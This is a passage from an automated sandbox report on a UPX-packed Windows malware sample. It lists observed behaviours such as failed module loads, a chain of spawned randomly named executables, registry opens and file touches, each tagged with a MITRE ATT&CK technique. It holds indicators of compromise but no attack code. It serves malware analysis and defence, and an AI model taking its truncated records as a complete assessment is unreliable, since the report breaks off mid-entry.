\"tlbnpbh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rpbfjr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rpbfjr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"jrrhxbf.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"jrrhxbf.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"lfnjxdh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"lfnjxdh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rhjvpvp.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rhjvpvp.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"624082.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"624082.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"42004.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"42004.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"2628204.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"2628204.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"vrjppt.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"vrjppt.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"prbhn.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"prbhn.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"lfhtd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"lfhtd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"040208.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"040208.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"fvjlh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"fvjlh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A10000\n \"026026.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A10000\n \"hfxjvn.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A10000\n \"vxbrbpd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A10000\n \"lbvtbl.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A10000\n \"22428.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A10000\n \"66488.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A10000\n \"4640842.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A10000\n \"068466.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A10000\n \"06200.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A10000\n \"8288862.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A10000\n \"0484046.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A10000\n \"tpjrfn.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A10000\n \"drpdftl.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A10000\n \"htpdr.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A10000\n \"frbnxt.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A10000\n \"bfllh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A10000\n \"hptntt.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A10000\n \"vtrppln.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A10000\n \"rdttflx.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A10000\n \"ljvfrdn.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A10000\n \"ntjvt.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A10000\n \"lllfpll.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A10000\n \"lxrhrth.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A10000\n \"nntvf.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A10000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f4d975@RPCRT4.dll\"\n \"15001600c03e1d6b@ADVAPI32.dll\"\n \"0e000f00703f1d6b@ADVAPI32.dll\"\n \"0e000f00cc3f1d6b@ADVAPI32.dll\"\n \"11001200b4471d6b@ADVAPI32.dll\"\n \"1100120048481d6b@ADVAPI32.dll\"\n \"120013008c481d6b@ADVAPI32.dll\"\n \"12001300e4481d6b@ADVAPI32.dll\"\n \"14001500386e1d6b@ADVAPI32.dll\"\n \"14001500506e1d6b@ADVAPI32.dll\"\n \"14001500686e1d6b@ADVAPI32.dll\"\n \"17001800806e1d6b@ADVAPI32.dll\"\n \"0d000e00986e1d6b@ADVAPI32.dll\"\n \"11001200a86e1d6b@ADVAPI32.dll\"\n \"11001200bc6e1d6b@ADVAPI32.dll\"\n \"0f001000fc6f1d6b@ADVAPI32.dll\"\n \"140015003c701d6b@ADVAPI32.dll\"\n \"1400150054701d6b@ADVAPI32.dll\"\n \"0c000d009c701d6b@ADVAPI32.dll\"\n \"0c000d00ac701d6b@ADVAPI32.dll\"\n \"0e000f00bc701d6b@ADVAPI32.dll\"\n \"0e000f00cc701d6b@ADVAPI32.dll\"\n \"0b000c00dc701d6b@ADVAPI32.dll\"\n \"1800190014731d6b@RPCRT4.dll\"\n \"1300140040731d6b@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"026026.exe\" (UID: 00000000-00005860)\n Spawned process \"hfxjvn.exe\" (UID: 00000000-00006136)\n Spawned process \"vxbrbpd.exe\" (UID: 00000000-00005996)\n Spawned process \"lbvtbl.exe\" (UID: 00000000-00005956)\n Spawned process \"22428.exe\" (UID: 00000000-00004388)\n Spawned process \"66488.exe\" (UID: 00000000-00003512)\n Spawned process \"4640842.exe\" (UID: 00000000-00006068)\n Spawned process \"068466.exe\" (UID: 00000000-00002260)\n Spawned process \"06200.exe\" (UID: 00000000-00006036)\n Spawned process \"8288862.exe\" (UID: 00000000-00006084)\n Spawned process \"0484046.exe\" (UID: 00000000-00005740)\n Spawned process \"tpjrfn.exe\" (UID: 00000000-00000848)\n Spawned process \"drpdftl.exe\" (UID: 00000000-00004232)\n Spawned process \"htpdr.exe\" (UID: 00000000-00006120)\n Spawned process \"frbnxt.exe\" (UID: 00000000-00004172)\n Spawned process \"bfllh.exe\" (UID: 00000000-00002096)\n Spawned process \"hptntt.exe\" (UID: 00000000-00006112)\n Spawned process \"vtrppln.exe\" (UID: 00000000-00004116)\n Spawned process \"rdttflx.exe\" (UID: 00000000-00000852)\n Spawned process \"ljvfrdn.exe\" (UID: 00000000-00004448)\n Spawned process \"ntjvt.exe\" (UID: 00000000-00002736)\n Spawned process \"lllfpll.exe\" (UID: 00000000-00003560)\n Spawned process \"lxrhrth.exe\" (UID: 00000000-00003668)\n Spawned process \"nntvf.exe\" (UID: 00000000-00001892)\n Spawned process \"806004.exe\" (UID: 00000000-00004472)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"026026.exe\" (UID: 00000000-00005860)\n Spawned process \"hfxjvn.exe\" (UID: 00000000-00006136)\n Spawned process \"vxbrbpd.exe\" (UID: 00000000-00005996)\n Spawned process \"lbvtbl.exe\" (UID: 00000000-00005956)\n Spawned process \"22428.exe\" (UID: 00000000-00004388)\n Spawned process \"66488.exe\" (UID: 00000000-00003512)\n Spawned process \"4640842.exe\" (UID: 00000000-00006068)\n Spawned process \"068466.exe\" (UID: 00000000-00002260)\n Spawned process \"06200.exe\" (UID: 00000000-00006036)\n Spawned process \"8288862.exe\" (UID: 00000000-00006084)\n Spawned process \"0484046.exe\" (UID: 00000000-00005740)\n Spawned process \"tpjrfn.exe\" (UID: 00000000-00000848)\n Spawned process \"drpdftl.exe\" (UID: 00000000-00004232)\n Spawned process \"htpdr.exe\" (UID: 00000000-00006120)\n Spawned process \"frbnxt.exe\" (UID: 00000000-00004172)\n Spawned process \"bfllh.exe\" (UID: 00000000-00002096)\n Spawned process \"hptntt.exe\" (UID: 00000000-00006112)\n Spawned process \"vtrppln.exe\" (UID: 00000000-00004116)\n Spawned process \"rdttflx.exe\" (UID: 00000000-00000852)\n Spawned process \"ljvfrdn.exe\" (UID: 00000000-00004448)\n Spawned process \"ntjvt.exe\" (UID: 00000000-00002736)\n Spawned process \"lllfpll.exe\" (UID: 00000000-00003560)\n Spawned process \"lxrhrth.exe\" (UID: 00000000-00003668)\n Spawned process \"nntvf.exe\" (UID: 00000000-00001892)\n Spawned process \"806004.exe\" (UID: 00000000-00004472)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1\" was detected as \"UPX\" and name: \"Packer\"\n \"rfbrlrh.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"blpjp.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"vllrv.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"hpjbbfh.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"4000248.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"vptfx.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"dvlvp.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"pdljr.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"brvtdb.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"2846688.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"488862.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"06448.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"vjrdb.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"tdplj.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"02482.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"86844.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"njnplr.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"jbvjrv.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"djhxhx.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rdtdhx.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"jhhhxxb.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"llfppf.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"hxfnr.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"xtxdjfh.exe\" was detected as \"UPX\" and name: \"Packer\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"lbvtbl.exe\" called \"CreateProcessA\" with parameter \"c:\\22428.exe\" - (UID: 00000000-00005956)\n \"06200.exe\" called \"CreateProcessA\" with parameter \"c:\\8288862.exe\" - (UID: 00000000-00006036)\n \"bfllh.exe\" called \"CreateProcessA\" with parameter \"c:\\hptntt.exe\" - (UID: 00000000-00002096)\n \"lllfpll.exe\" called \"CreateProcessA\" with parameter \"c:\\lxrhrth.exe\" - (UID: 00000000-00003560)\n \"2820044.exe\" called \"CreateProcessA\" with parameter \"c:\\8600684.exe\" - (UID: 00000000-00003812)\n \"040208.exe\" called \"CreateProcessA\" with parameter \"c:\\xbbhhv.exe\" - (UID: 00000000-00004588)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1\" has an executable section named \"UPX0\"\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1\" has an executable section named \"UPX1\"\n \"rfbrlrh.exe\" has an executable section named \"UPX0\"\n \"rfbrlrh.exe\" has an executable section named \"UPX1\"\n \"blpjp.exe\" has an executable section named \"UPX0\"\n \"blpjp.exe\" has an executable section named \"UPX1\"\n \"vllrv.exe\" has an executable section named \"UPX0\"\n \"vllrv.exe\" has an executable section named \"UPX1\"\n \"hpjbbfh.exe\" has an executable section named \"UPX0\"\n \"hpjbbfh.exe\" has an executable section named \"UPX1\"\n \"4000248.exe\" has an executable section named \"UPX0\"\n \"4000248.exe\" has an executable section named \"UPX1\"\n \"vptfx.exe\" has an executable section named \"UPX0\"\n \"vptfx.exe\" has an executable section named \"UPX1\"\n \"dvlvp.exe\" has an executable section named \"UPX0\"\n \"dvlvp.exe\" has an executable section named \"UPX1\"\n \"pdljr.exe\" has an executable section named \"UPX0\"\n \"pdljr.exe\" has an executable section named \"UPX1\"\n \"brvtdb.exe\" has an executable section named \"UPX0\"\n \"brvtdb.exe\" has an executable section named \"UPX1\"\n \"2846688.exe\" has an executable section named \"UPX0\"\n \"2846688.exe\" has an executable section named \"UPX1\"\n \"488862.exe\" has an executable section named \"UPX0\"\n \"488862.exe\" has an executable section named \"UPX1\"\n \"06448.exe\" has an executable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1\" has an writable section named \"UPX0\"\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1\" has an writable section named \"UPX1\"\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1\" has an writable section named \"UPX2\"\n \"rfbrlrh.exe\" has an writable section named \"UPX0\"\n \"rfbrlrh.exe\" has an writable section named \"UPX1\"\n \"rfbrlrh.exe\" has an writable section named \"UPX2\"\n \"blpjp.exe\" has an writable section named \"UPX0\"\n \"blpjp.exe\" has an writable section named \"UPX1\"\n \"blpjp.exe\" has an writable section named \"UPX2\"\n \"vllrv.exe\" has an writable section named \"UPX0\"\n \"vllrv.exe\" has an writable section named \"UPX1\"\n \"vllrv.exe\" has an writable section named \"UPX2\"\n \"hpjbbfh.exe\" has an writable section named \"UPX0\"\n \"hpjbbfh.exe\" has an writable section named \"UPX1\"\n \"hpjbbfh.exe\" has an writable section named \"UPX2\"\n \"4000248.exe\" has an writable section named \"UPX0\"\n \"4000248.exe\" has an writable section named \"UPX1\"\n \"4000248.exe\" has an writable section named \"UPX2\"\n \"vptfx.exe\" has an writable section named \"UPX0\"\n \"vptfx.exe\" has an writable section named \"UPX1\"\n \"vptfx.exe\" has an writable section named \"UPX2\"\n \"dvlvp.exe\" has an writable section named \"UPX0\"\n \"dvlvp.exe\" has an writable section named \"UPX1\"\n \"dvlvp.exe\" has an writable section named \"UPX2\"\n \"pdljr.exe\" has an writable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rfbrlrh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"blpjp.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"vllrv.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"hpjbbfh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"4000248.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"vptfx.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"dvlvp.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"pdljr.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"brvtdb.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"2846688.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"488862.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"06448.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"vjrdb.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"tdplj.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"02482.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"86844.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"njnplr.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"jbvjrv.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"djhxhx.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rdtdhx.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"jhhhxxb.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"llfppf.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"hxfnr.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"xtxdjfh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"026026.exe\" trying to access non-existent file \"c:\\FLTLIB.DLL\"\n \"026026.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"026026.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"026026.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"026026.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"026026.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" reads file \"c:\\48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\"\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" reads file \"c:\\026026.exe\"\n \"026026.exe\" reads file \"c:\\026026.exe\"\n \"026026.exe\" reads file \"c:\\hfxjvn.exe\"\n \"hfxjvn.exe\" reads file \"c:\\hfxjvn.exe\"\n \"hfxjvn.exe\" reads file \"c:\\vxbrbpd.exe\"\n \"vxbrbpd.exe\" reads file \"c:\\vxbrbpd.exe\"\n \"vxbrbpd.exe\" reads file \"c:\\lbvtbl.exe\"\n \"lbvtbl.exe\" reads file \"c:\\lbvtbl.exe\"\n \"lbvtbl.exe\" reads file \"c:\\22428.exe\"\n \"22428.exe\" reads file \"c:\\22428.exe\"\n \"22428.exe\" reads file \"c:\\66488.exe\"\n \"66488.exe\" reads file \"c:\\66488.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\026026.EXE\"; Key: \"\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\\APPCERTDLLS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" trying to touch file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" trying to touch file \"c:\\026026.exe\"\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n 